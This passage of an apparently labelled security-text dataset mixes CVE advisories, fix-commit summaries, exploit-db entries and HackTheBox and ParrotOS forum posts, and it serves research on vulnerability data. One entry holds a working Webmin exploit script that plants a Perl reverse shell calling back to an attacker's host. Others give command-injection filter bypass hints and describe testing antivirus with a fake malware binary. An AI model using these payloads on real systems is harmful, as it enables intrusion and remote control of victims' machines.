"split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "943f223373cebca75855", "text": "CVE: CVE-2022-2306\n\n[{'lang': 'en', 'value': 'Old session tokens can be used to authenticate to the application and send authenticated requests.'}]\n\nFix commit: Correctly console session token on all logouts. (#875)", "source": "cvefixes", "timestamp": "2022-07-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8335ade9ab128606bb24", "text": "This is some crazy ■■■■… HTB just likes making life harder. The questions, hints and expected answer format takes way longer than completing the module itself.", "source": "hackthebox", "timestamp": "2023-10-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "208a48f7e9d01e99b379", "text": "MCMS vulnerable to arbitrary code execution via crafted thumbnail\n\n[Severity: HIGH]\n\nFile upload vulnerability in MCMS 5.0 allows attackers to execute arbitrary code via a crafted thumbnail. A different vulnerability than CVE-2022-31943.", "source": "github_advisory", "timestamp": "2023-05-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "11f618340c4abf3c0c5c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995, CVE-2018-1019.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bfebc8f2b18414eea436", "text": "Zend Framework XEE Vulnerability\n\n[Severity: MEDIUM]\n\n(1) `Zend_Dom`, (2) `Zend_Feed`, and (3) `Zend_Soap` in Zend Framework 1.x before 1.11.13 and 1.12.x before 1.12.0 do not properly handle SimpleXMLElement classes, which allow remote attackers to read arbitrary files or create TCP connections via an external entity reference in a DOCTYPE element in an XML-RPC request, aka an XML external entity (XXE) injection attack, a different vulnerability than CVE-2012-3363.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "21446b7d5115508dd5a6", "text": "rails-ujs vulnerable to DOM Based Cross-site Scripting contenteditable HTML Elements\n\n[Severity: MEDIUM]\n\nNOTE: rails-ujs is part of Rails/actionview since 5.1.0.\n\nThere is a potential DOM based cross-site scripting issue in rails-ujs\nwhich leverages the Clipboard API to target HTML elements that are\nassigned the contenteditable attribute. This has the potential to\noccur when pasting malicious HTML content from the clipboard that\nincludes a data-method, data-remote or data-disable-with attribute.\n\nThis vulnerability has been assigned the CVE identifier CVE-2023-23913.\n\nNot affected: < 5.1.0\nVersions Affected: >= 5.1.0\nFixed Versions: 6.1.7.3, 7.0.4.3\n\nImpact\n If the specified malicious HTML clipboard content is provided to a\n contenteditable element, this could result in the arbitrary execution\n of javascript on the origin in question.\n\nReleases\n The FIXED releases are available at the normal locations.\n\nWorkarounds\n We recommend that all users upgrade to one of the FIXED versions.\n In the meantime, users can attempt to mitigate this vulnerability\n by removing the contenteditable attribute from elements in pages\n that rails-ujs will interact with.\n\nPatches\n To aid users who aren’t able to upgrade immediately we have provided\n patches for the two supported release series. They are in git-am\n format and consist of a single changeset.\n\n* rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series\n* rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series\n\nPlease note that only the 7.0.Z and 6.1.Z series are\nsupported at present, and 6.0.Z for severe vulnerabilities.\n\nUsers of earlier unsupported releases are advised to upgrade as\nsoon as possible as we cannot guarantee the continued availability\nof security fixes for unsupported releases.\n\nCredits\n We would like to thank ryotak 15 for reporting this!\n\n* rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)\n* rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)\n* rails-ujs-data-method-contenteditable-main.patch (8.9 KB)\n", "source": "github_advisory", "timestamp": "2023-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dab78ff0b33ca48973db", "text": "I used too this: But I dont know why i cannot get flag, and this payload is triggered as malicious. Anyone could help me with that? Thx", "source": "hackthebox", "timestamp": "2022-10-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fe77adca32441c606957", "text": "CVE: CVE-2022-23624\n\n[{'lang': 'en', 'value': 'Frourio-express is a minimal full stack framework, for TypeScript. Frourio-express users who uses frourio-express version prior to v0.26.0 and integration with class-validator through `validators/` folder are subject to a input validation vulnerability. Validators do not work properly for request bodies and queries in specific situations and some input is not validated at all. Users are advised to update frourio to v0.26.0 or later and to install `class-transformer` and `reflect-metadata`.'}]\n\nFix commit: feat(validation): use class-transformer to support validation of nested objects\n\nCo-authored-by: SegaraRai ", "source": "cvefixes", "timestamp": "2022-02-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "875d0c3778858ed27d92", "text": "I managed to extract de wordlist from Assessment.dll with dotPeak (JetBrains) and used also the decoding part of it. Wordlist of 999 lines. Iteration of these words resulted in 998 times 404 (Not Found) and 1 resulted in a 403 (Forbidden). That was string h******s, but no success either. Please help.", "source": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e7907cfb53f45475b7ae", "text": "Protection against hacking programs\n\nI have a question how to protect yourself from kali linux and other hacker programs, what ports should be blocked as generally as possible to protect yourself from them because antiviruses and firewalls are not enough, although I note that I have never used kali linux or parrot OS so please understand I would like to ask how I should secure the network when it comes to network security, I have blocked ports such as TCP and UDP ports 135 ~ 139, 445, 1234, 3389 and 5555. What other ports should be blocked additionally to protect your home network when it comes to wifi I have WPA3 secured I would like to ask you how to protect your computer, how to protect your BIOS against various attacks, what should be blocked to prevent an attacker from accessing the BIOS, how to protect HDD and SSD disks against the possibility of attacking the disk, I read that there are tools in linux that they can what should be blocked and is this option generally available ?? and how to protect processor and ram", "source": "parrotsec", "timestamp": "2022-11-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4aead50e63f0a8003a5c", "text": "Analyzing Windows Defender's sigantures for fun\n\nThe database of Windows Defender can be extracted with WDExtract . A deep analysis of the db structure is at experiments/windows-defender/VDM at master · commial/experiments · GitHub A signature can be parse with a struct like this struct { uint8_t sig_type; uint8_t size_low; uint16_t size_high; uint8_t value[size_low | size_high << 8]; } sig_entry; The length of value is changed every time database controller reads a new signature. To make it be easier to analysis, I wrote a simple script to parse and print information of each signature in the db (tested with AV sigs only, the AS (anti spyware) wasn’t tested gist.github.com https://gist.github.com/dmknght/0c28f952026a3a4d97232fca6a3f598c parse_windef_sigs.nim import streams import bitops import strutils import std/enumutils const db_name = \"mpavbase.vdm.extracted\" type This file has been truncated. show original An example after parsing the whole db: ===================Threat BEGIN=================== SigType: SIGNATURE_TYPE_THREAT_BEGIN s_low: 32 s_high: 0 len: 32 Value: @[\"c\", \"\\\\xAF\", \"\\\\x02\", \"\\\\x80\", \"\\\\x00\", \"\\\\x00\", \"\\\\x01\", \"\\\\x00\", \"\\\\x06\", \"\\\\x00\", \"\\\\x0A\", \"\\\\x00\", \"\\\\x84\", \"!Wkysol.J\", \"\\\\x00\", \"\\\\x00\", \"\\\\x01\", \"@\", \"\\\\x05\", \"\\\\x82\", \"B\", \"\\\\x00\", \"\\\\x04\", \"\\\\x00\"] SigType: SIGNATURE_TYPE_PEHSTR_EXT s_low: 192 s_high: 0 len: 192 Value: @[\"\\\\x04\", \"\\\\x00\", \"\\\\x04\", \"\\\\x00\", \"\\\\x06\", \"\\\\x00\", \"\\\\x00\", \"\\\\x01\", \"\\\\x00\", \"-\", \"\\\\x00\", \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", \"\\\\x01\", \"\\\\x00\", \"\\\\x0C\", \"\\\\x01\", \"/put.asp?nm=\", \"\\\\x01\", \"\\\\x00\", \"\\\\x15\", \"\\\\x01\", \"/get.asp?nm=index.dat\", \"\\\\x01\", \"\\\\x00\", \"\\\\x1C\", \"\\\\x01\", \"Rj\", \"\\\\x00\", \"j\", \"\\\\x00\", \"j\", \"\\\\x00\", \"j\", \"\\\\x00\", \"j\", \"\\\\x00\", \"j\", \"\\\\x00\", \"h \", \"\\\\x02\", \"\\\\x00\", \"\\\\x00\", \"j j\", \"\\\\x02\", \"\\\\x8D\", \"E\", \"\\\\xDC\", \"P\", \"\\\\xFF\", \"\\\\x15\", \"\\\\x01\", \"\\\\x00\", \"\\\\x1C\", \"\\\\x03\", \"\\\\x80\", \"\\\\xC9\", \"\\\\x80\", \"\\\\x89\", \"\\\\x8D\", \"\\\\x90\", \"\\\\x01\", \"\\\\x04\", \"j\", \"\\\\x04\", \"\\\\x8D\", \"\\\\x95\", \"\\\\x90\", \"\\\\x1B\", \"\\\\x00\", \"Rj\", \"\\\\x1F\", \"\\\\x8B\", \"\\\\x85\", \"\\\\x90\", \"\\\\x01\", \"\\\\x04\", \"P\", \"\\\\xFF\", \"\\\\x15\", \"\\\\x90\", \"\\\\x00\", \"\\\\x01\", \"\\\\x00\", \"\\\\x19\", \"\\\\x01\", \"\\\\x8D\", \"U\", \"\\\\xA8\", \"RSSSSSSh \", \"\\\\x02\", \"\\\\x00\", \"\\\\x00\", \"j j\", \"\\\\x02\", \"\\\\x8D\", \"E\", \"\\\\xDC\", \"P\", \"\\\\xFF\", \"\\\\x15\", \"\\\\x00\", \"\\\\x00\"] SigType: SIGNATURE_TYPE_THREAT_END s_low: 4 s_high: 0 len: 4 Value: @[\"c\", \"\\\\xAF\", \"\\\\x02\", \"\\\\x80\"] -------------------Threat END--------------------- Malware name: !Wkysol.J Detection method: Find strings in PE file ( SIGNATURE_TYPE_PEHSTR_EXT ) Test the fake “malicious” binary against the scanner[s] (i used VirusTotal). Create a simple Nim file $cat test.nim const s1 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" s2 = \"/put.asp?nm=\" s3 = \"/get.asp?nm=index.dat\" s4 = \"RSSSSSSh\" Compile PE file: nim c -d:mingw test.nim Result: VirusTotal image 1316×267 32.5 KB The result is interesting: Windows defender didn’t detect this fake binary as a malicious file. Because the conditions are compiled, so we don’t really know the actual conditions that WinDef uses to match a binary (could be specific ranges, offset or anything else). However, we can see some machine learning engines are having false positives.", "source": "parrotsec", "timestamp": "2023-02-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "27369b220b78760bd0c3", "text": "CVE: CVE-2022-1620\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in GitHub repository vim/vim prior to 8.2.4901. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.'}]\n\nFix commit: patch 8.2.4901: NULL pointer access when using invalid pattern\n\nProblem: NULL pointer access when using invalid pattern.\nSolution: Check for failed regexp program.", "source": "cvefixes", "timestamp": "2022-05-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "17592588cca2003ae1cb", "text": "image 876×261 22.4 KB You are getting this error because you haven’t entered the correct IP click on the Spawn Target then the system will give you an IP try to do ssh with that IP.", "source": "hackthebox", "timestamp": "2023-12-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4899a54454e8d028e77b", "text": "spring-integration-zip Arbitrary File Write\n\n[Severity: MEDIUM]\n\nAddresses partial fix in CVE-2018-1261. Pivotal spring-integration-zip, versions prior to 1.0.2, exposes an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "834d9dfd4d42ec838586", "text": "[Session Fixation] CVE-2023-40273: Session fixation in Apache Airflow web interface\n\nWhen I reset the password of the test user through the button Reset Password, I hope that the person who previously had the password of the test user will lose the corresponding authority. However, if others have logged in to the test user before, they can still use the account.\n{F2630619}\n{F2630620}\nIn short,Change user password wouldn't prevent an already authenticated user from being able to continue using the UI or API.\n\n## Impact\n\nThe session fixation vulnerability allowed the authenticated user to continue accessing Airflow webserver even after the password of the user has been reset by the admin - up until the expiry of the session of the user.", "source": "hackerone", "timestamp": "2023-09-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "93e14dc518943250a2c0", "text": "I hey I just found the flag myself. I did manage to utilize the printf function after the fact, but there’s an issue around the 10th iteration. Mind taking a look at it?", "source": "hackthebox", "timestamp": "2022-11-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "96df407612c73f9133ed", "text": "CVE: CVE-2022-30708\n\n[{'lang': 'en', 'value': 'Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.'}]\n\nFix commit: Factor out check for root-ish user into a separate function https://github.com/webmin/webmin/issues/1635", "source": "cvefixes", "timestamp": "2022-05-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2011a663f2db8736a308", "text": "This was a tough one. I found it helpful to do like they were saying and: Manually explore every button in the web app (while logging everything in BurpSuite or OWASP ZAP) Make note of any new HTTP Parameters as you’re going as the application acts differently depending on what parameters are supplied. Keep an eye out for the Visual error that they were talking about “Malicious request” as this is a good sign that you might be hitting input validation Ask yourself why something may need input validation? Developers aren’t going to put input validation in places where it isn’t needed.", "source": "hackthebox", "timestamp": "2023-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "97487d714fefcbd7777b", "text": "Parrot Devs will never call you, be aware of pfishers and snoopers @Masmer", "source": "parrotsec", "timestamp": "2023-12-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3d13acc47c5f8ccb69b7", "text": "Wifite isn’t showing the SSID associated with the MAC addresses? I know at my place the ROKU shows up like that - just a MAC address without an SSID. Probably some Apple, Amazon, etc. streaming products do that too. Maybe video surveillance devices (like RING cameras) show up as well. None of them appear to be identifiable via their OUI’s. https://www.macvendorlookup.com/ https://www.wireshark.org/tools/oui-lookup.html", "source": "parrotsec", "timestamp": "2022-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "23fdd68f75d06a013849", "text": "Perhaps a stupid question, I always performed all the tasks through my own VM, how do I copy the clipboard to pwnbox?)", "source": "hackthebox", "timestamp": "2022-06-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c2b74760924bda3b7e6a", "text": "I am working on the Tier 1 Responder Machine and running into this same problem. Someone mentioned Parrot being an issue? Would it be better to do this one in Pwnbox instead?", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0790581e18a8d71cd5d5", "text": "CVE: CVE-2021-3798\n\n[{'lang': 'en', 'value': 'A flaw was found in openCryptoki. The openCryptoki Soft token does not check if an EC key is valid when an EC key is created via C_CreateObject, nor when C_DeriveKey is used with ECDH public data. This may allow a malicious user to extract the private key by performing an invalid curve attack.'}]\n\nFix commit: SOFT: Check the EC Key on C_CreateObject and C_DeriveKey\n\nWhen constructing an OpenSSL EC public or private key from PKCS#11\nattributes or ECDH public data, check that the key is valid, i.e. that\nthe point is on the curve.\n\nThis prevents one from creating an EC key object via C_CreateObject with\ninvalid key data. It also prevents C_DeriveKey to derive a secret using\nECDH with an EC public key (public data) that uses a different curve\nor is invalid by other means.\n\nSigned-off-by: Ingo Franzki ", "source": "cvefixes", "timestamp": "2022-08-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "939c1d9a0cf16ce8ea1a", "text": "try replacing your port number with the word PORT in your answer", "source": "hackthebox", "timestamp": "2023-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2ada99b2d5e91c18c4a4", "text": "Can anyone help me out, not sure where I’m going wrong. I have read hints from previous posts but still cant get it. here is what I’ve done: I have tried variations of #3 where I URL encode <<< with no luck", "source": "hackthebox", "timestamp": "2023-10-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "48c48c3db351d042f6b9", "text": "Payara, when deployed to the root context, allows attackers to visit META-INF and WEB-INF\n\n[Severity: HIGH]\n\nPayara before 2022-11-04, when deployed to the root context, allows attackers to visit META-INF and WEB-INF, a different vulnerability than CVE-2022-37422. This affects Payara Platform Community before 4.1.2.191.38, 5.x before 5.2022.4, and 6.x before 6.2022.1, and Payara Platform Enterprise before 5.45.0.", "source": "github_advisory", "timestamp": "2022-11-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cc5a40adb784d0c381e1", "text": "If you are looking for wireless adapter pentesting then ALFA dual band wireless adapter is must. Please note that your pc network interface doesn’t support monitoring and packet injection. I would prefer your to buy ALFA dual band wireless adapter. But beginner to set up on kali Linux, would be frustating but you can watch david bombal youtube video.", "source": "hackersploit", "timestamp": "2022-03-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aaa21050dd479c2907f9", "text": "Hi @Isa777 Hope you are great today. I was trying to find resources in order to start with cybesecurity and pentesting. I found a guy named S4vitar at Twicht and you tube. Check this Scripting en Bash para principiantes #1 - YouTube . Also OverTheWire: Wargames if you want to start with practical examples or hackthebox website as well. Hope this resources are fine for you as are great for me. Regards.", "source": "parrotsec", "timestamp": "2022-07-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2d5cc4e879d616e6bff4", "text": "CVE: CVE-2022-0219\n\n[{'lang': 'en', 'value': 'Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.'}]\n\nFix commit: fix: use secure xml parser for process manifest", "source": "cvefixes", "timestamp": "2022-01-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f5e5ea4bfd35c7b57ed4", "text": "Webmin 1.984 - Remote Code Execution (Authenticated)\n\n# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)\n# Date: 2022-03-06\n# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)\n# Vendor Homepage: https://www.webmin.com/\n# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip\n# Version: <= 1.984\n# Tested on: Ubuntu 18\n# Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell\n\n\n#!/usr/bin/python3\n\n\"\"\"\nCoded by: @faisalfs10x\nGitHub: https://github.com/faisalfs10x\nReference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/\n\"\"\"\n\nimport requests\nimport urllib3\nimport argparse\nimport os\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nTGREEN = '\\033[32m'\nTRED = '\\033[31m'\nTCYAN = '\\033[36m'\nTSHELL = '\\033[32;1m'\nENDC = '\\033[m'\n\nclass Exploit(object):\n def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):\n self.target = target\n self.username = username\n self.password = password\n self.py3http_server = py3http_server\n self.pyhttp_port = pyhttp_port\n self.upload_path = upload_path\n self.callback_ip = callback_ip\n self.callback_port = callback_port\n self.fname = fname\n\n #self.proxies = proxies\n self.s = requests.Session()\n\n\n def gen_payload(self):\n payload = ('''perl -e 'use Socket;$i=\"''' + self.callback_ip + '''\";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};' ''')\n print(TCYAN + f\"\\n[+] Generating payload to {self.fname} in current directory\", ENDC)\n f = open(f\"{self.fname}\", \"w\")\n f.write(payload)\n f.close()\n\n def login(self):\n login_url = self.target + \"/session_login.cgi\"\n cookies = { \"redirect\": \"1\", \"testing\": \"1\", \"PHPSESSID\": \"\" }\n\n data = { 'user' : self.username, 'pass' : self.password }\n try:\n r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)\n success_message = 'System hostname'\n if success_message in r.text:\n print(TGREEN + \"[+] Login Successful\", ENDC)\n else:\n print(TRED +\"[-] Login Failed\", ENDC)\n exit()\n\n except requests.Timeout as e:\n print(TRED + f\"[-] Target: {self.target} is not responding, Connection timed out\", ENDC)\n exit()\n\n def pyhttp_server(self):\n print(f'[+] Attempt to host http.server on {self.pyhttp_port}\\n')\n os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up\n print('[+] Sleep 3 second to ensure http server is up!')\n time.sleep(3) # Sleep for 3 seconds to ensure http server is up!\n\n def download_remote_url(self):\n download_url = self.target + \"/extensions/file-manager/http_download.cgi?module=filemin\"\n headers = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": self.target + \"/filemin/?xnavigation=1\"\n }\n\n data = {\n 'link': \"http://\" + self.py3http_server + \"/\" + self.fname,\n 'username': '',\n 'password': '',\n 'path': self.upload_path\n }\n\n r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)\n print(f\"\\n[+] Fetching {self.fname} from http.server {self.py3http_server}\")\n\n def modify_permission(self):\n modify_perm_url = self.target + \"/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30\"\n headers = { \"Refere", "source": "exploitdb", "timestamp": "2022-03-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bc96a276c40937a8a4dd", "text": "CVE: CVE-2022-0932\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository saleor/saleor prior to 3.1.2.'}]\n\nFix commit: Require manage orders for fetching `user.orders` (#9128)\n\n* Require manage orders for fetching customer.orders\r\n\r\n* Update changelog\r\n\r\nCo-authored-by: Marcin Gębala <5421321+maarcingebala@users.noreply.github.com>", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3ea3ad131eb8df300c69", "text": "CVE: CVE-2022-21687\n\n[{'lang': 'en', 'value': \"gh-ost is a triggerless online schema migration solution for MySQL. Versions prior to 1.1.3 are subject to an arbitrary file read vulnerability. The attacker must have access to the target host or trick an administrator into executing a malicious gh-ost command on a host running gh-ost, plus network access from host running gh-ost to the attack's malicious MySQL server. The `-database` parameter does not properly sanitize user input which can lead to arbitrary file reads.\"}]\n\nFix commit: Security: fix vulnerability where `-database` parameter accepts arbitrary DSN strings\n\n(cherry picked from commit 4dab3d5a689c6a5727174980071c7f9a563193f1)", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2c4d6111c000e1afacb5", "text": "Cross-site scripting in yui 2.4.0\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.9.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to charts.swf, a similar issue to CVE-2010-4207.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1f910cd1a92aaf173e59", "text": "Unauthenticated File Read in PHP Proxy\n\n[Severity: HIGH]\n\nIn PHP Proxy 3.0.3, any user can read files from the server without authentication due to an `index.php?q=file:///` LFI URI, a different vulnerability than CVE-2018-19246.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "26a66dbd8a60603b3525", "text": "First click on the copy to on any file and copy it to the tmp folder.From there if u tried to (copy to) and move the file u will get the malicious request denied.I used burp and Network monitor( ctrl + shift + e ) when using network monitor right click on the GET request that led to Malicious request denied then it will open new request which u can modify and send it to see the result which will be on response.I injected the code after ‘to=’ . “to=tmp&from=tmp%2F51459716.txt&finish=1&move=1” this is the request that u will be modifying.The hint is to inject the code in the right place( so here we are doing mv tmp/51459716.txt tmp) 51459716.txt is the file i copied to tmp and tried to move. / , cat and space are blacklisted maybe there is others but those what u will need to make your code work.u can use the encoding method but make sure to change the space to ${IFS} also u can use cat but u need to modify the / and space.u can direct message me and i can help.", "source": "hackthebox", "timestamp": "2023-12-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "becd147882be05f89700", "text": "Howdy, Noder_SS, I can say I am not a master tech of the IT/pen-testing world, but I think this can help out a bit. I also do not know all of everyone’s skills or abilities, so here is a general amount of knowledge. https://learn-bash.org/ One of the most fun and exciting things about linux, is that users can get under the hood and have a lot of flexibility. Sometimes this also requires some basic to intermediate/advanced knowledge of bash (which is the terminal language) knowing how to change to a different directory in a command line, make a new files, using nano and man pages, chmod, sudo apt, grep, ssh, and other functions. Just being able to run commands as a super user is awesome because super users are not limited like in windows, where even if running as an administrator there are some functions that are not allowed. One great place to always go to is the user manuals, Parrot OS has a great starting place for people to learn the operating system here: parrotsec.org What is ParrotOS? | ParrotOS Documentation Parrot Security (ParrotOS, Parrot) is a Free and Open source GNU/Linux distribution based on Debian Stable designed for security experts, developers and privacy aware people. This helps with installing the system on a computer as a standalone install, dual boot, or even running in a program using virtualization like virtual box. One of the tools that is documented in the parrot os documentation is nmap, Very neat tool, it can be used for pen-testing and other useful IT testing. Nmap | ParrotOS Documentation and if you need videos for step by step guides, just search nmap on youtube. If say for instance a user installed the home edition and not the security edition, a user can use sudo apt install parrot-tools-full to download all of the pen-testing tools Parrot os has to offer. (99% of the time) There is quite a few tools that can be used including wireless tools, forensic tools, vulnerability scanning, reverse engineering and other tools within parrot os. Just be warned there is a lot of tools available that, if used in the wrong way may cause a lot of issues. Another site to learn about how some of these tools work or how to learn more about pen-testing is the following: academy.hackthebox.com HTB Academy : Cyber Security Training Cyber security training with hands-on exercises and labs made by Hack The Box, join now and advance your cyber security skills! The website has a lot of information and study labs/guides that even allow users to run a virtual machine of Parrot OS on the cloud to run these classes. A big thing about learning anything about computers, and doing certain tasks. Is learning how computers, operating systems, and computer networking operate. For instance, if someone wants to replace a tire with a spare on a car but the user does not know how to use a car jack or what tools/skills are needed to remove the wheel, they may not be able to replace the tire. So it may be beneficial to know what is the the difference is between WEP, 802.1x, and WPA3 if someone wants to be using a pen-testing tool in parrotOS for WIFI networks as an example. Some channels to check out on youtube that have great content for Pen-testing, cyber security, and SysAdmin videos. Including learn about commands in linux, windows, and MacOS is the following: NetworkChuck - Great detailed content, a lot of coffee breaks. Learn pentesting, networking, virtualization etc. Loi Liang Yang - Very thorough step by step teachings of pentesting and other fun things on different devices. and Professor Messer - If studying for the Comptia tests this dude is your go to. Playlists are amazing and cover everything a person in IT needs to know. (from basics to advanced) In-fact I learned about Professor Messer and other great bug resolutions, problem solving, and how to use some pen-testing programs by searching and reading the Parrot OS community posts. This is the link I found out about Professor Messer: Looking For Advice - #2 by Masmer Not to mention, Google, Microsoft, Amazon, and other companies also have online training (some free", "source": "parrotsec", "timestamp": "2022-11-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9f6537ae2cf1b478c23a", "text": "Windows 11 10.0.22000 - Backup service Privilege Escalation\n\n## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation\n## Author: nu11secur1ty\n## Date: 01.13.2023\n## Vendor: https://www.microsoft.com/\n## Software: https://www.microsoft.com/en-us/software-download/windows11\n## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752\n\n## Description:\nWindows 11 Pro build 10.0.22000 Build 22000 suffers from Backup\nservice - Privilege Escalation vulnerability.\nAn attacker who successfully exploited this vulnerability could gain\nSYSTEM privileges.\nand could delete data that could include data that results in the\nservice being unavailable.\n\n\n## STATUS: HIGH Vulnerability - CRITICAL\n\n[+] Exploit:\n[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)\n\n## Reference:\n[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752)\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)\n\n## Proof and Exploit:\n[href](https://streamable.com/f2dl3m)\n\n\n\n--\nSystem Administrator - Infrastructure Engineer\nPenetration Testing Engineer\nExploit developer at https://packetstormsecurity.com/\nhttps://cve.mitre.org/index.html https://0day.today/\nhttps://cxsecurity.com/ and https://www.exploit-db.com/\nhome page: https://www.nu11secur1ty.com/\nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\n nu11secur1ty ", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0f64fe41ba81d59074c8", "text": "Trying to install 'perf'\n\nHey, can anyone tell me, how to install ‘perf’ on Parrot OS? It’s not available on Parrot’s repo, I also searched for solutions online and got to know that ‘perf’ will be present along with ‘linux-tools-common’ (according to ubuntu’s forum). But, it’s not available in the Parrot’s repo as well. This is how my /etc/apt/sources.list looks like. deb Index of /parrot/ lts main contrib non-free deb-src Index of /parrot/ lts main contrib non-free Can someone point me towards what link to add here, so that I don’t break my other packages, when I update. Thanks in advance.", "source": "parrotsec", "timestamp": "2023-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7fcb2e5de47b4d45716d", "text": "Hi this is Palak Sharma Well, as a software developer with some knowledge of Python, I'm looking to take my skills to the next level and become a pro at Python programming. I'm interested in taking an online course, but with so many options available, it's hard to know which ones are worth the investment. What are the best online Python courses available that can help me achieve my goal of 